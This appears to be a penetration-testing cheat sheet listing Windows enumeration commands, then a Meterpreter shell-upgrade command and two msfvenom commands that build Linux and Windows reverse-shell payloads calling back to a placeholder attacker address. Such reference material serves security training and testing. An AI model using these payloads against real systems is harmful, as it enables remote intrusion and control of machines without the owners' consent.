Cyberspace Operations

Windows Enumeration Commands

cls clears the command prompt screen

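dir <text.txt> /s /p searches the current directory and its subdirectories (/s) for the file text.txt and shows the directory it is in, pausing after each screen of output (/p)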

driverquery shows all of the drivers on the computer

ipconfig shows the current IP configuration for the computer

ipconfig /all shows an expanded or verbose version of ipconfig.

listdlls -u shows information about all installed DLLs. This requires Administrator or elevated privileges, but it does not hurt to check whether a misconfiguration allows unelevated users to run this command.

net start without options displays all of the network services available

net start <service> starts the network service

net stop <service> stops the network service

netstat -an | find /i "established" shows all of the IP addresses and ports the computer is connected to.

netstat -an | find /i "listening" shows all of the IP addresses and ports the computer is listening on.

netstat -ano shows all of the IPs that the computer is interacting with and displays the process ID (PID) for each interaction.

strings <file name> dumps all string (text) information associated with the file.

tasklist shows all of the currently running processes

type <file.txt> displays the file in the Windows command line

powershell.exe -noexit starts PowerShell in command line.

systeminfo displays hardware, OS, and kernel information for the computer.

Windows WMIC Enumeration


execute -f cmd.exe -i -H upgrades the Meterpreter shell to a Windows shell.

MSFVenom Payload Cheat Sheet

msfvenom --platform linux -p linux/x64/meterpreter_reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf -o shellme creates a Linux x64 reverse shell and outputs a file named shellme with the shell code.

msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=XXXX EXITFUNC=thread -f python -a x86 -b \x00\ creates a Windows reverse shell with an exit function for x86 architecture and ensures that bad characters are not utilized.